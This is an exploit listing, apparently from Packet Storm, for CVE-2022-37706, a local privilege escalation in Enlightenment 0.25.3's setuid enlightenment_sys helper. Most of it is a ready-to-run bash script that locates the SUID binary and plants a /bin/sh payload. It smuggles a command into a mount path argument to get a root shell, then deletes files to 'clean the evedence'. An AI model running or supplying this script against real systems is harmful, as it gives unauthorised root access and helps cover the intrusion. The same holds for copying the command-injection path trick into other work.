Share
## https://sploitus.com/exploit?id=PACKETSTORM:170339
## Title: Enlightenment Version: 0.25.3 LPE  
## Author: nu11secur1ty  
## Date: 12.26.2022  
## Vendor: https://www.enlightenment.org/  
## Software: https://www.enlightenment.org/download  
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706  
  
## Description:  
The Enlightenment Version: 0.25.3 is vulnerable to local privilege escalation.  
Enlightenment_sys in Enlightenment before 0.25.4 allows local users to  
gain privileges because it is setuid root,  
and the system library function mishandles pathnames that begin with a  
/dev/.. substring  
If the attacker has access locally to some machine on which the  
machine is installed Enlightenment  
he can use this vulnerability to do very dangerous stuff.  
  
## STATUS: CRITICAL Vulnerability  
  
## Tested on:  
```bash  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=22.10  
DISTRIB_CODENAME=kinetic  
DISTRIB_DESCRIPTION="Ubuntu 22.10"  
PRETTY_NAME="Ubuntu 22.10"  
NAME="Ubuntu"  
VERSION_ID="22.10"  
VERSION="22.10 (Kinetic Kudu)"  
VERSION_CODENAME=kinetic  
ID=ubuntu  
ID_LIKE=debian  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
UBUNTU_CODENAME=kinetic  
LOGO=ubuntu-logo  
```  
  
[+] Exploit:  
  
```bash  
#!/usr/bin/bash  
# Idea by MaherAzzouz  
# Development by nu11secur1ty  
  
echo "CVE-2022-37706"  
echo "[*] Trying to find the vulnerable SUID file..."  
echo "[*] This may take few seconds..."  
  
# The actual problem  
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)  
if [[ -z ${file} ]]  
then  
echo "[-] Couldn't find the vulnerable SUID file..."  
echo "[*] Enlightenment should be installed on your system."  
exit 1  
fi  
  
echo "[+] Vulnerable SUID binary found!"  
echo "[+] Trying to pop a root shell!"  
mkdir -p /tmp/net  
mkdir -p "/dev/../tmp/;/tmp/exploit"  
  
echo "/bin/sh" > /tmp/exploit  
chmod a+x /tmp/exploit  
echo "[+] Welcome to the rabbit hole :)"  
  
${file} /bin/mount -o  
noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u),  
"/dev/../tmp/;/tmp/exploit" /tmp///net  
  
read -p "Press any key to clean the evedence..."  
echo -e "Please wait... "  
  
sleep 5  
rm -rf /tmp/exploit  
rm -rf /tmp/net  
echo -e "Done; Everything is clear ;)"  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)  
## Proof and Exploit:  
[href](https://streamable.com/zflbgg)  
  
## Time spent  
`01:00:00`